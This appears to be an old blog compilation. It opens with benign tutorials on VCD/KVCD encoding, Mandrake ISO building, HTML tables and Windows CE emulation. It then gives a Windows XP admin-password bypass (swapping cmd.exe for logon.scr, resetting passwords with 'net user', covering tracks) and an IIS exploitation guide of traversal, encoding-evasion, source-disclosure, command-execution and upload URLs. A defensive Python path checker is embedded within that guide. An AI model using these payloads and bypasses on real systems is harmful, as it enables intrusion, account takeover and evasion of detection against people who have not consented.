
Sunday, 04 January 2009

how to make a VCD from a DivX

Tools required: the latest VirtualDub, TMPGEnc and Nero (and the DivX codecs).

Preparing:

Download all the tools. Be sure to install the DivX 3.11, DivX 4 and the latest DivX 5 codecs.

Extracting the audio: Start VirtualDub. Open your video with File->Open video file (if you get any warnings, just ignore them; you won't edit the video, only extract the audio).

Select File->File Information and note the fps as the video source fps; you will need it later.

Under Audio, select Full processing mode.

Select Audio->Compression and choose <No compression (PCM)>.

Select Audio->Conversion.

Change the sampling rate to 44100 Hz if you are going to make VCD or SVCD MPEGs.

Save the wav by clicking File->Save WAV... The wav will be a huge uncompressed audio file (about 10 MB/minute).

Encoding:

Start TMPGEnc. Press Cancel if the Project Wizard comes up.

Press Browse... and select the DivX file as the Video source input.

Now press the Browse button for the Audio source input and use the saved wav file.

Press Load and load the template file from the Template directory of TMPGEnc:

If the video source fps is 29,970, load VideoCD (NTSC).mcf

If the video source fps is 23,970, load VideoCD (NTSCFilm).mcf

If the video source fps is 25,000, load VideoCD (PAL).mcf

If the video source fps is anything else, just load NTSC if you live in the US or Japan and PAL if you live anywhere else.

Note: if you live in the US or Japan and have problems playing PAL (often showing up as black-and-white TV playback), first check whether you can switch your TV or DVD player to PAL; if not, convert to NTSC instead by loading the VideoCD (NTSC) template.

Note: if you live in Europe or the rest of the world and have problems playing NTSC or NTSCFilm (often showing up as black-and-white TV playback), first check whether you can switch your TV or DVD player to PAL; if not, convert to PAL by loading the VideoCD (PAL) template.

Press Settings and choose Advanced.

Under Video arrange method, select Full screen (keep aspect ratio) to keep the same aspect ratio (widescreen or fullscreen) as the video source. If you have a widescreen movie and want it in fullscreen, select No margin (keep aspect ratio) instead.

Select Source range and double-click it.

In the next dialog you can choose the source range. This depends on the DivX file. If the DivX file is less than 80 min (for an 80 min/700 MB CD-R), you do not have to split it across two CDs. If the DivX file is already in two parts, just convert the first file and then the second. But if the movie is in one file and over 80 minutes long, you need to select the source range: drag the horizontal scrollbar to the middle of the selection so that the first CD gets the same length as the second. After selecting the middle, press Set end frame. A new value appears under End Frame; write it down, you will need it for the encoding of the second part. The start frame must of course be 0.

After pressing OK, you only have to select the output file name. I prefer the movie name with the CD number (e.g. Ghost in the Shell CD1) for the burning.

Now encode the file by pressing the Start button.

While encoding you can select File->Preview (it won't affect the encoding) to see how the output will look. If it looks wrong (widescreen or fullscreen), you can stop the encoding, start over and change, in particular, Settings->Advanced->Video arrange method.

If you only want to burn the movie on one CD, jump to the burning guide; otherwise follow the next points.

Repeat the third, fourth and fifth points. In the Source range dialog, now use the noted value as Start frame and move the horizontal scrollbar to the end of the movie.

After pressing Set end frame, press OK twice.

Now select the output filename for the second file (e.g. Ghost in the Shell CD2) and encode it.

After the encoding is done and everything went right, you should have one file for every CD.

Burning:

Launch Nero. Close the Wizard. Select File->New.

1. Select VideoCD.

2. Select PAL or NTSC depending on what format your source MPEG is in.

3. Hit New.

1. Locate your .mpg and drag it in (see picture below). You can also add several .mpgs; each mpg will be its own track on the VCD, and you can add data files as well, just drag them to any folder.

2. Check the time. It should be the same as in the movie.

3. Rename the CD to anything you like by selecting NEW and pressing F2.

4. Select File->Write CD.




don't know about everyone else.. but the only options i choose on tmpgenc to make mpeg-1 files are either NTSC film 23.976, or NTSC video 29.97 fps..

i also live in the u.s. so i do all of mine accordingly.. why do you save the wave file with virtual dub.. or should i say, why do you even process the divx file with vdub.. yeah if it is your last resort and the divx for some reason doesn't open in tmpgenc.. i've got 180+ Divx movies, some downloaded mostly ripped, never had a problem encoding them with tmpgenc plus.

just seems like you are going from your a$$ to your elbow to do this.

1. take divx movie (120 minutes long for example).. open with vdub.. find a keyframe about halfway through the film, preferably at a scene change. choose "SET SELECTION START" from the EDIT menu.. scroll all the way to the end of the film, choose "SET SELECTION END"... hit DELETE or choose "DELETE SELECTION", all from the EDIT menu

2. Now you have 1 half of your movie. under the VIDEO menu, choose "DIRECT STREAM COPY", also make sure that under AUDIO it is going to generate a "DIRECT STREAM COPY". Then go to FILE and choose "SAVE as AVI..." on a newer computer this will take less than 2 minutes..

3. When it is complete, the quickest way to proceed is to just click on FILE / "OPEN VIDEO FILE". at the beginning of the clip, choose "SET SELECTION START" again, snap back to the keyframe (half way through the film) which you cut half the film off at and choose "SET SELECTION END". DELETE... FILE / "SAVE AS AVI..." save as the other half of film.. once again, will usually take less than 2 minutes...

4. choose options accordingly, this next part can be important.. (i'm going to give the rest of the instructions as if you were making an ntsc movie) since you want to make a standard mpeg-1 file, choose NTSC FILM or NTSC VIDEO.. BROWSE for your file, then hit NEXT, then the OTHER SETTINGS / ADVANCED tab ... now there is an option that says "VIDEO ARRANGE METHOD".. if you are making a fullscreen movie, leave it on FULLSCREEN.. if you are encoding a widescreen movie, choose "FULL SCREEN (KEEP ASPECT RATIO)".. OK / NEXT / NEXT (you get the point)

basically takes 1 step out of the tutorial above.. the instructions for nero appear to be correct.. but here's another tip..

dvd burners are becoming more and more popular and even i got one now, like many of you do. tired of old vcd's or wanna encode a VCD standard DVD with nearly 9 hours of video (but same quality as a normal 80 minute VCD)? if this is the case, make sure you encode your DivX files as "NTSC VIDEO 29.97 FPS".. even if the source is 23 fps... and once you have 3 or 4 movies, get yourself a proggy called TMPGENC DVD AUTHOR.. make a track for each movie.. and you've got yourself a dvd with 3 or 4 average length movies on 1 dvd (with menus if you like) that is WAY MORE COMPATIBLE than a VCD..

do a search for the keyword VCD-DVD and i posted a more descriptive tutorial on how to do this..

how to make a new web site



WWW.blogger.com


easy and simple to make a web blog fast to try.......


http://www.make-a-web-site.com/


http://www.pagetutor.com/pagetutor/makapage/index.html


www.webmonkey.com


Colour Palletes


http://colormatch.dk


HTMLlock <---Need


http://www.devside.net


http://www.devside.net/download/crypto/disclaimer1.html


well, if you want the text separate from the image, you could just do this:




<!-- one row, two cells: text on the left, image on the right -->
<table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td>
your text here, it's totally fun, yeah yeah yeah
</td>
<td>
<img src="your picture here">
</td>
</tr>
</table>


if you want to have the image on the left side, and text on the right side, just reverse the code like so:




<!-- same row, cells swapped: image on the left, text on the right -->
<table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td valign="bottom" align="left">
<img src="your picture here">
</td>
<td>
your text here, it's totally fun, yeah yeah yeah
</td>
</tr>
</table>

How To Make A Kvcd

How to make a KVCD, or in other words how to get a 700 MB AVI file down to about 450 MB to make a VCD without any picture loss.

So you've downloaded a movie in AVI format and you want to watch it on your DVD player. You re-encode it and it comes out at about 1100, maybe 1200 MB, so you have to split it and save it on 2 discs. The following tutorial will show you how to do it on one disc.


First you are going to need some tools.

VirtualDub:
http://heanet.dl.sourceforge.net/sourceforge/virtualdub/VirtualDub-1.5.10.zip

HeadAC3he:
http://mitglied.lycos.de/darkav/download/headac3he-0.23a.rar

and some DLLs:
http://mitglied.lycos.de/darkav2/download/MPAlib_MMX-1.00(1.50).rar
http://mitglied.lycos.de/darkav2/download/ssrc_MMX-1.01(1.28).rar
http://mitglied.lycos.de/darkav2/download/Vorbis_MMX-1.20(1.74).rar
http://mitglied.lycos.de/darkav2/download/Lame_enc_MMX-1.28(3.93).rar
http://mitglied.lycos.de/darkav2/download/MP2enc_MMX-1.15(1.13).rar

Put the above DLLs in the same folder as HeadAC3he.

BeSweet:
http://dspguru.notrace.dk/BeSweetv1.4.zip
http://dspguru.notrace.dk/BeSweetGUIv0.6.zip

Put these 2 in the same folder.

You will need Nero as well, but I'm hoping you have that already; if not, it's on this forum.

TMPGEnc: again, it's on this forum.

You will need some templates:
http://www.kvcd.net/dvd-models.html

Right-click and save all the PAL templates if your DVD player is PAL, or the NTSC ones if it is NTSC. Save them to the Template folder in the TMPGEnc folder.




So, to begin:

Open VirtualDub. Go to File -> Open video file and locate the AVI file you want to convert. If you get a warning, ignore it.

Click the Audio menu at the top and make sure Source audio and Direct stream copy both have a black dot next to them.

Go to File -> Save WAV. You have to give this file a .ac3 extension, for example "view from the top.ac3". I would save it in the same folder your AVI is in. Once you've named it, press Save. A box will open; let it do its thing. This is taking the sound from the film.

Now open the Audio menu and select No audio. You should have a black dot next to No audio and Direct stream copy.

Go to Video and select Direct stream copy.

Go to File -> Save as AVI. Name the file whatever you want; again, put it in the same folder as the original AVI. To make life easier I call mine the film title plus "nosound", i.e. viewfromthetopnosound. Press Save. This is now saving the film without sound.

You can now close VirtualDub.


Open BeSweet. A scary-looking box appears; don't worry, here's what to do.

At the BeSweet.exe field, locate the BeSweet folder; it will show BeSweet.exe in the "Enter file name" box. Click on it; at the bottom it will say "valid". Press OK.

Now go to Input and find the .ac3 file we just made (you will need to change the "Enter file name" filter from .Lst to .ac3). Double-click the .ac3 file you made; at the bottom it will say "valid". Press OK.

Now, looking at the GUI, make sure "Use ac3 decoder" is ticked and "Downconvert sample rate" is ticked. In the toolame dropdown box make sure it says mp2. Leave the rest alone.

Now press "Copy command to clipboard". Go to Start -> Run, right-click and paste, then press OK.

If all the settings are correct, a black box will open and the AC3 will be transcoded to MP2. If not, check that the boxes are ticked. If it is OK, leave it to do its thing. Once the black box has disappeared, close BeSweet.

Open HeadAC3he. Hopefully you put all the DLLs in the HeadAC3he folder, otherwise you will get error messages, so make sure you do that. Done it? OK, let's go.

Press Source file and find the new MP2 file we just made. Change the destination format to MP2 and press Start. That's it; once it's finished, close HeadAC3he.


For your info: things are going to start looking messy inside your folder, so if you want you can delete some things. Go to the folder where your original AVI file is. You can delete the .ac3 file and the MP2 file without the ".2" in its name, i.e. you will have two files with the same name, one with ".2" on the end; keep that one. This is so we don't get confused later.


Open TMPGEnc and close the wizard if it opens.

Press the Video source Browse button and find the file we made with "nosound" on the end, i.e. viewfromthetopnosound.

Now, if you went to the KVCD page and downloaded all the templates, this will help; if not, go and do that now. Done it? Right, let's go.

I'm afraid I'm not in front of your PC doing this for you, so I hope I explain it well.

Press Load. You will see a load of files in front of you, some starting with kvcd. This is trial-and-error stuff now: pick the first one beginning with kvcd, highlight it and press Open.

Now press Start. The preview box in front of you will start encoding. The make-up of the original AVI file affects the outcome of the finished film: if you look at the box and all you see is a tiny box with film in it, that is the size it will come out. If it looks weird, press Stop and load a different template. The best result is one that looks like widescreen. I hope that made sense. Just press Start and overwrite the file.

Anyway, let it do its thing; how long this takes depends on your PC specs. So let's assume it's done.

Go to File -> MPEG tools. The first tab should be Simple multiplex. Press the Video input Browse button and find the new file we just made; it will have an .m1v extension. Press the Audio input Browse button and find the MP2 file with ".2" in the name. The Output box will be set to MPEG automatically. Press Run and let it do its thing, then close TMPGEnc.


Open Nero and select VCD. Untick "Create standard compliant CD" and press New.

Find the new file we made; it will be in the original AVI folder but with an .mpeg extension. Now you have to drag this into the left box (don't right-click and "copy to compilation"). A box will appear and a blue line will go across. If a warning comes up about it not being a compliant VCD, ignore it and carry on.

Press Burn and burn at the speed you want. Once finished, press the OK box, then press Done. The disc will come out, and now to test: put it in your DVD player and hey presto, the film kicks in. Depending on whether your DVD player can play VCDs, that is.


0NLY3DUC4T10N

How To Make 5cds, 10cds Or 2dvds From Official Dow, These are same as Mandrake PowerPack+

Download the full official tree. It comes in at over 5 GB. The full tree includes the usual Mandrake, 3 GB of extra apps under contrib and 330 MB of Java apps under contrib/jpackage.

After downloading, I have successfully created 4 versions including the hard drive installation:

1) Hard Drive/Network/FTP install (same thing)
2) 10 CD version including everything
3) 5 CD version (used to be 4 CDs; this will eventually be the ISO download)
4) 2 DVD version, which includes everything in the 10 CD version.

Additionally I have discovered that Mandrake is stressing everyone for no apparent reason. The much talked about 8 MB boot.iso file that is supposedly needed to boot and choose your method of installation is no different from the regular boot files that come on CD1 of any version.

The only thing you have to do is edit the file "isolinux.cfg" in the isolinux folder. Inside the file, remove all instances of "automatic=method:cdrom" and save the file. Then create the images for whichever "version" of mdk10 you choose. To create the different versions listed above you have to do 2 things first:

1) Edit the "hdlists" file in the "Mandrake/base" folder. In this file you will find a list of all the hdlist.cz files needed to build a particular version. Remove the 3 lines for "SRPM" files. Depending on which version you want to create, the 10CD and the DVD versions will have these 3 lines:

a) hdlist.cz   Mandrake/RPMS    Installation CD
b) hdlist2.cz  Mandrake/RPMS2   Contrib CD
c) hdlist3.cz  Mandrake/RPMS3   Jpackage.org

Take note of the paths above. If you downloaded the whole tree like I did, you will have these folders. The RPMS folder is the standard 4 or 5 CD download version. The RPMS2 and RPMS3 folders added to the RPMS folder make the 10CD and DVD version. So to make the 5CD version, remove the last two lines. Don't forget to back up the original "hdlists" file.

2) To make the 10 CD or 2 DVD version, use the "mkcd" command below. Use a discsize of 716800000 for the 10CD version and 4000000000 for the 2 DVD version. When the command finishes, the images will be in the directory you specified after the -t option.

To make the 5CD version, move the folders "RPMS2" and "RPMS3" someplace safe and don't forget to remove the last two lines in the "hdlists" file as described above. The RPMS2 and RPMS3 folders are only links, so it should take no time at all to move them. Then use a discsize of 716800000 and run the "mkcd" command. Don't forget to move the RPMS2 and RPMS3 folders back to their original location when you finish your 5CD images.

Also remember that you will need plenty of disk space if you want to keep all the images for all versions on your hard drive. I have the 10CD, 5CD, 2 DVD and the HD install files all on my hard drive and they take up 23 GB.

mkcd --discsize 716800000 -t ./5CD-Version -a -s ./hdinstall

--discsize is the size of the image you want to make, in bytes. The figure above is for a 700 MB CD. I used 4000000000 (9 zeroes) to make 2 DVDs.

-t <path to where you want to make the images>

-a means automatic creation based on the hdlist files and the downloaded directory structure. It keeps you from having to use many other ugly options on the command line.

-s <source directory of mdk10>: this is the top folder, not the RPM folder. This top folder will have the "Mandrake" folder in it.

Original link:
http://linuxiso.org/forums/viewtopic.php?t=18140

How to Install and run Windows CE on your USB Stick



Portable Windows CE is a 'launcher' for the Windows CE device emulator that can run an emulator-based image from a USB keychain.


Download the Windows CE 5.0 Device Emulator:

http://www.Mcft.com/downloads/details.aspx?FamilyID=A120E012-CA31-4BE9-A3BF-B9BF4F64CE72&displaylang=en

(Change "Mcft" in the link to what it is supposed to be.)


Extract the emulator to a folder on your hard drive by running "setup /a". The installer will prompt you to specify a directory to extract to, for example D:\PortableCE.


Download this launcher script:

http://www.furrygoat.com/Software/launchce.cmd.txt

Copy the launcher script to the directory you extracted the setup to. You'll need to rename the file from launchce.cmd.txt to launchce.cmd.


Once you have that set up, just copy the entire D:\PortableCE folder over to your USB keychain.


To launch the emulator, just plug in your USB keychain, navigate to the PortableCE folder, and run launchce.cmd. You should (hopefully) have the emulator fire up.

How to hack-change your Windows XP Boot Screen



HACKING THE XP BOOT SCREEN


This is a very simple trick to do if you have done the same for the logon screen and the start button. There are 2 ways to do this trick that I know about: one is doing it manually and the other is using a program called BootXP. I am going to tell you the manual way to do it, but if you want to know the other way just let me know, so I can do an update to the guide. Now once you have downloaded your ntoskrnl.exe file, save it to a general location so that you will have easy access to it, like My Folder.

Once you have the ntoskrnl.exe file in an easy-access folder, restart your PC into safe mode. Once in safe mode, go to the folder where your files are located.

Now that you are there, copy the file that you want to change your boot screen to. Once you have copied that file, hit the Windows key + R, or type %windir%\system32 in the Run command, to open that folder.

Once there, paste your new file into the folder and overwrite the existing file.

Now that you have your new file in the folder, restart your PC as you normally would and your new boot screen should appear. You can download this bootscreen here.


ALWAYS BACKUP EVERYTHING YOU EDIT OR DELETE. I'M NOT RESPONSIBLE IF YOU MESS YOUR COMPUTER UP BY DOING THIS HACK OR ANY TYPE OF HACK. DO IT AT YOUR OWN RISK.


Image and ntoskrnl.exe files provided by www.themexp.org


or


you can go to:

http://www.overclockersclub.com/guides/hackxpbootscreen.php


onlyeducation

How To Hack Windows Xp Admin Passwords

How to hack Windows XP Admin Passwords the easy way by Estyle, Jaoibh and Azrael.

------------------------------------------------------------------------------

This hack will only work if the person that owns the machine has no intelligence. This is how it works:

When you or anyone installs Windows XP for the first time, you're asked to put in your username and up to five others. Now, unbeknownst to a lot of other people, this is the only place in Windows XP that you can password the default Administrator Diagnostic Account. This means that to bypass most administrator accounts on Windows XP, all you have to do is boot to safe mode by pressing F8 during boot-up and choosing it. Log into the Administrator Account and create your own or change the password on the current Account.

This only works if the user on setup specified a password for the Administrator Account.

This has worked for me on both Windows XP Home and Pro.

-----------------------------------------------------------------------------

Now this one seems to be machine dependent; it works randomly (don't know why).

If you log into a limited account on your target machine and open up a DOS prompt, then enter this set of commands exactly:

(this appeared on www.astalavista.com a few days ago but I found that it wouldn't work on the welcome screen of a normally booted machine)

-----------------------------------------------------------------------------

cd\                                 *drops to root
cd\windows\system32                 *directs to the system32 dir
mkdir temphack                      *creates the folder temphack
copy logon.scr temphack\logon.scr   *backs up logon.scr
copy cmd.exe temphack\cmd.exe       *backs up cmd.exe
del logon.scr                       *deletes original logon.scr
rename cmd.exe logon.scr            *renames cmd.exe to logon.scr
exit                                *quits dos

-----------------------------------------------------------------------------

Now what you have just done is told the computer to back up the command program and the screen saver file, then edited the settings so that when the machine boots the screen saver you will get an unprotected DOS prompt without logging into XP.

Once this happens, enter this command minus the quotes:

"net user <admin account name here> password"

If the Administrator Account is called Frank and you want the password blah, enter this:

"net user Frank blah"

and this changes the password on Frank's machine to blah and you're in.

Have fun

p.s: don't forget to copy the contents of temphack back into the system32 dir to cover tracks

Any updates, errors, suggestions or just general comments mail them to either

goodluck...only education

Sunday, 14 September 2008

Guide to IIS Exploitation

***************************************************************************
*                       Guide to IIS Exploitation                         *
*                              by fugjostle                               *
*                                                                         *
*                                 V.1.0.1                                 *
*                                                                         *
*           Questions? Comments? Email: fugjostle at ch0wn.com            *
***************************************************************************


Disclaimer: I do not condone hacking IIS servers in any way, shape or form. This guide is intended as a guide for admins to help them understand what most script kiddies don't understand but are happy to exploit.





--[On the first day, God created directory traversal]

Relative paths are the developer's friend. They allow an entire website to be moved to another directory without the need to change all the links in the HTML. For example, let's say we have a webpage called 'pictures.html' in the htdocs dir:

Absolute path: /home/webpages/htdocs/pictures.html
Absolute path: /home/webpages/images/pic1.gif

In the HTML you can refer to 'pic1.gif' via the absolute path shown above or use a relative path:

Relative path: ../images/pic1.gif

The relative path tells the server that it has to go to the parent directory (dot dot) --> from /home/webpages/htdocs to /home/webpages. Then the server goes into the images dir and looks for the gif file to display. Anyone who has used the 'cd' command in DOS and *nix should be familiar with the operation. So what's the problem, I hear you ask... well, the programmers of the web server didn't think to check the supplied URL to ensure that the requested file was actually in the web directory. This allows someone to backtrack through the server's directory structure and request any file that the web server has access to. For example:

http://www.target.com/../../../etc/passwd

NB. You can also use extra dots and doubled slashes, as in the example below. This is useful to evade Intrusion Detection Systems (IDS):

http://www.target.com//....//....//...././etc/./passwd

The webserver simply strips the extra stuff out and processes the request. This is the same as the previous example and can make string-matching IDSs work for their money.





--[On the second day, God created Hexadecimal]

Once programmers started to realise the mistake, they began to create parser routines to check for naughty URLs and keep the requests within the document root. Then along comes a wily hacker who wonders whether, if the URL is encoded, it will still be recognised by the parser routines.

You may have noticed that when you enter a URL that includes a space, it is replaced with the hex equivalent (%20):

http://www.target.com/stuff/my index.html

becomes

http://www.target.com/stuff/my%20index.html

and voila, it works. So what would happen if we changed the now-denied URL:

http://www.target.com/../../../etc/passwd

to

http://www.target.com/%2e%2e/%2e%2e/%2e%2e/etc/passwd

The parser routine checks for the existence of dots in the path and finds none... the webserver then proceeds with the request.

An interesting feature is that you can encode the percent symbol itself and the web server will decode it all for you. This is called the "double decode". For example, given the URL "http://victim.com/..%252f..%252fdocs/", the following will take place:

(1) On the first decode, the string will be converted to:
    "http://victim.com/..%2f..%2fdocs/"
    [%25 = '%', so '%252f' is decoded to '%2f']

(2) On the second decode, the string will be converted to:
    "http://victim.com/../../docs/"
    [%2f = '/']





--[On the third day, God created Unicode]

The World Wide Web is a global phenomenon and as such needs to be globally interoperable. This raised the question of how to deal with all the different character sets around the world. As a response to this, Unicode was created:

-----------------------------------------------------------------
Unicode provides a unique number for every character, no matter
what the platform, no matter what the program, no matter what
the language. The Unicode Standard has been adopted by such
industry leaders as Apple, HP, IBM, JustSystem, Microsoft,
Oracle, SAP, Sun, Sybase, Unisys and many others. Unicode is
required by modern standards such as XML, Java, ECMAScript
(JavaScript), LDAP, CORBA 3.0, WML, etc., and is the official
way to implement ISO/IEC 10646. It is supported in many operating
systems, all modern browsers, and many other products.
-----from http://www.unicode.org---------------------------------





The problem with Unicode is that it requires 16 bits for a single character, while software tended to use 8 bits for a single character. So Unicode Transformation Format using 8 bits (UTF-8) was created. This allows multibyte encoding, where a variable number of bytes can be used for each character:

Character   1-byte   2-byte   3-byte
    .         2E     C0 AE    E0 80 AE
    /         2F     C0 AF    E0 80 AF
    \         5C     C1 9C    E0 81 9C

(Only the 1-byte column is valid UTF-8; the 2-byte and 3-byte forms are "overlong" encodings of the same characters, which a strict decoder must reject.)

This led to a new vulnerability in certain webservers. The parser didn't understand this new encoding and allowed it through :-)

For example:

www.target.com/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/etc/passwd

Recent vulnerabilities have been taking advantage of the fact that the web server doesn't understand the Unicode UTF-8 character set but the underlying OS does:

www.target.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c%20dir

Understanding the distinction between Unicode and UTF-8 can be difficult. As a general rule of thumb you can use the following format as a guide:

%uxxxx = Unicode
%xx%xx = UTF-8
%xx    = Hexadecimal
%xxxx  = Double Decode
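The three "days" above describe one defensive requirement: a server must decode a request path completely (repeatedly, and with a strict UTF-8 decoder) before deciding whether it stays inside the document root, because a filter that looks for ".." before decoding sees nothing in %2e%2e, %252e or %c0%ae. The following Python is an added example written for this guide; it is not code from the guide, from IIS or from any other product. The function names (canonicalise_path, resolve_components, escapes_web_root), the finding labels and the handling of malformed input are this example's own choices; the request paths in the self-test are the guide's own examples with the placeholder host names dropped.

```python
"""Canonicalise a request path and report the encoding tricks the guide
describes: plain dot-dot, %2e hex encoding, %252e double decoding, overlong
UTF-8 such as %c0%ae / %c0%af, and the %uXXXX form.

Added example for this guide; not code from the guide, from IIS or from any
other product.  The function names, the finding labels and the behaviour on
malformed input are this example's own choices.
"""

import re
from urllib.parse import unquote_to_bytes

# The %uXXXX form the guide lists is not part of standard percent-encoding.
PERCENT_U = re.compile(r"%u[0-9a-fA-F]{4}")


def _has_overlong_utf8(raw: bytes) -> bool:
    """True if raw contains a non-shortest-form UTF-8 sequence: a C0/C1 lead
    byte (two-byte overlong, e.g. C0 AE for '.') or E0 followed by 80..9F
    (three-byte overlong, e.g. E0 80 AF for '/').  A strict UTF-8 decoder
    rejects these; the vulnerable parsers accepted them."""
    for i, b in enumerate(raw):
        if b in (0xC0, 0xC1):
            return True
        if b == 0xE0 and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0x9F:
            return True
    return False


def _path_chars(s: str) -> int:
    """Count the characters that matter for traversal: '.', '/' and '\\'."""
    return sum(s.count(c) for c in "./\\")


def canonicalise_path(url_path: str, max_decodes: int = 2):
    """Percent-decode the path part of url_path until it stops changing (at
    most max_decodes rounds) and return (decoded_path, findings).  Decoding
    more than once is what exposes '%252e': a single-pass filter sees '%2e',
    never the dot."""
    findings = []
    current = url_path.split("?", 1)[0]            # the query is not the path
    if PERCENT_U.search(current):
        findings.append("percent-u")
    for round_no in range(1, max_decodes + 1):
        raw = unquote_to_bytes(current)
        if _has_overlong_utf8(raw):
            findings.append("overlong-utf8")
        # errors="replace" keeps the function total; the finding above, not
        # the replacement character, is what marks the request as hostile.
        decoded = raw.decode("utf-8", errors="replace")
        if decoded == current:
            break                                   # nothing left to decode
        if round_no > 1:
            findings.append("double-decode")
        if _path_chars(decoded) > _path_chars(current):
            findings.append("encoded-path-char")    # %2e / %2f hid a dot or slash
        current = decoded
    return current, findings


def resolve_components(path: str):
    """Resolve '.', '..', empty segments and backslashes the way the file
    system would.  Returns (segments, escaped); escaped is True when '..'
    climbs above the root at any point.  posixpath.normpath silently discards
    a leading '..', which is exactly the case a server must refuse."""
    stack, escaped = [], False
    for seg in path.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if stack:
                stack.pop()
            else:
                escaped = True
            continue
        stack.append(seg)
    return stack, escaped


def escapes_web_root(url_path: str) -> bool:
    """The decision a server-side filter should make: refuse the request if
    the fully decoded path climbs out of the document root, or if it carries
    an encoding that no strict parser would accept."""
    decoded, findings = canonicalise_path(url_path)
    _, escaped = resolve_components(decoded)
    return escaped or "overlong-utf8" in findings or "percent-u" in findings


if __name__ == "__main__":
    # Request paths from the guide's own examples, host names dropped.
    for p in ("/../../../etc/passwd",
              "/%2e%2e/%2e%2e/%2e%2e/etc/passwd",
              "/..%252f..%252fdocs/",
              "/scripts/..%c0%af../winnt/system32/cmd.exe?/c%20dir",
              "/stuff/my%20index.html"):
        decoded, findings = canonicalise_path(p)
        verdict = "refuse" if escapes_web_root(p) else "allow"
        print(f"{p:55} -> {decoded!r} {findings} {verdict}")
```

Two design points matter here. Decoding is repeated until the string stops changing, so the double-decode case is caught by the same loop that handles plain hex, and the result is resolved component by component rather than with posixpath.normpath, which drops a leading ".." and would hide the one case that counts. Python's strict UTF-8 decoder already refuses C0 AE and C0 AF; the explicit overlong check only makes that refusal attributable, so a log entry can record why a request was rejected.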


--[On the fourth day, God created default installs]


IIS comes installed with various DLL's (Dynamic Link Libraries) that


increase the functionality of the web server. These ISAPI (Internet Server


API) applications allow programmers/developers to deliver more functionality


to IIS.


The DLL's are loaded into memory at startup and offer significant speed


over traditional CGI programs. For example, they can be combined with the


Internet Database Connector (httpodbc.dll) to create interactive sites that


use ODBC to access databases.


The problem is that some of these DLL's are insecure and are often installed


with sample scripts that demonstrate how to exploit, erm, I mean use them.


ASP.DLL is used to pre-process requests that end in ".asp". ASP (Active


Server Pages) are basically HTML pages with embedded code that is processed


by the webserver before serving it to the client.


Here's some examples to illustrate how the sample pages installed by default


can aid someone breaking into your site via the ASP.DLL:


[prefix all the examples with http://www.target.com]


/default.asp.


** Appending a '.' to the URL can reveal the source


** on older systems. Remember hex encoding? You can


** also try using %2e to do the same thing.


/msadc/samples/adctest.asp


** This gives you an interface into the msadcs.dll


** and allows creation of DSN's. Read RFP's stuff


** for idea's on how to exploit this.


/iissamples/exair/howitworks/codebrws.asp?source=/msadc/Samples/../../.../../../../boot.ini


/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/../../../../.../boot.ini


** You can view the source of anything in the


** document root. '/msadc/' needs to be in the


** request as it is checked for, wait for this,


** security :-)


/index.asp::$DATA


** Appending '::$DATA' to the URL can reveal


** the source of the ASP.


/index.asp%81




** Append a hex value between 0x81 and 0xfe


** and you can reveal the source of any server


** processed file. This only works on servers


** that are Chinese, Japanese or Korean.


/AdvWorks/equipment/catalog_type.asp?ProductType=|shell("cmd+/c+dir+c:\")|


** This one allows you to execute remote


** shell commands ;-)


ISM.DLL is used to process requests that end in ".htr". These pages were used
to administer IIS3 servers. In IIS4 they are not used but various .htr samples
are installed by default anyway and offer another avenue for entry.

/index.asp%20%20%20..(220 more)..%20%20.htr

** IIS will redirect this request to ISM.DLL,
** which will strip the '.htr' extension and
** deliver the source code of the file.

/global.asa+.htr

** Does the same thing as the %20%20 exploit
** above. ISM.DLL strips the +.htr and delivers
** you the source of the file.

/scripts/iisadmin/ism.dll?http/dir

** Excellent brute force opportunity if the
** dll exists. Successful logons will reveal
** lots of useful stuff.

/iisadmpwd/aexp.htr

** The iisadmpwd directory contains several .htr
** files that allow NetBIOS resolution and
** password attacks.

/scripts/iisadmin/bdir.htr??c:\inetpub\www

** This method will only reveal directories
** but can be useful for identifying the
** server's structure for more advanced
** attacks later.

MSADCS.DLL is used to allow access to ODBC components via IIS using RDS
(Remote Data Service). RDS is part of the default install of Microsoft Data
Access Components (MDAC) and is commonly exploited on IIS. It can allow
arbitrary shell commands to be executed with system privileges.

/msadc/msadcs.dll

** If this file exists then there's a pretty
** good chance that you can run the RDS
** exploit against the box. More on this later.

HTTPODBC.DLL is the Internet Database Connector (IDC) and is used when the web
server wants to connect to a database. It allows the creation of web pages
from data in the database, and it allows you to update/delete items from
within webpages. Pages with the extension '.idc' are sent to the HTTPODBC.DLL
for processing.

/index.idc::$DATA

** Appending '::$DATA' to the URL can reveal
** the source of the IDC.

/anything.idc

** Requesting a non-existent file will
** reveal the location of the web root.

/scripts/iisadmin/tools/ctss.idc

** Creates a table based on the parameters it
** receives. Excellent place to look at for
** SQL injection.

SSINC.DLL is used for processing Server Side Includes (SSI). '.stm',
'.shtm' and '.shtml' extensions are sent to the DLL which interprets
the SSI statements within the HTML before sending it to the client.

An example of SSI would be:

<!--#include file="news.txt"-->

This SSI tells the server to include 'news.txt' in the final HTML
sent to the user. SSI statements are beyond the scope of this document
but offer another security hole open to our wily hax0r. Ensure you
remove the app mapping and disable SSI if you do not require its
functionality.

SSINC.DLL is also vulnerable to a remote buffer overflow, read the
following advisory for details:

http://www.nsfocus.com/english/homepage/sa01-06.htm

Some examples of SSINC.DLL fun:

/anything.stm

** If you request a file that doesn't exist
** then the server error message contains
** the location of the web root.

/somedir/anything.stm/somedir/index.asp

** Using this method allows you to view
** the source code for index.asp.

IDQ.DLL is a component of MS Index Server and handles '.ida' and '.idq'
requests. This DLL has had some big exposure with the recent Nimda worm.
I'm not going into too much detail but '.ida' was used in a buffer
overflow that resulted in user defined code being executed on the server.

/anything.ida or /anything.idq

** Requesting a non-existent file will
** reveal the location of the web root.

/query.idq?CiTemplate=../../../boot.ini

** You can use this to read any file on
** the same drive as the web root.

CPSHOST.DLL is the Microsoft Posting Acceptor. This allows uploads to your
IIS server, via a web browser or the Web Publishing Wizard. The existence of
this DLL can allow attackers to upload files to the server. Other files such as
uploadn.asp, uploadx.asp, upload.asp and repost.asp are installed with Site
Server and allow upload of documents to the server:

/scripts/cpshost.dll?PUBLISH?/scripts/dodgy.asp

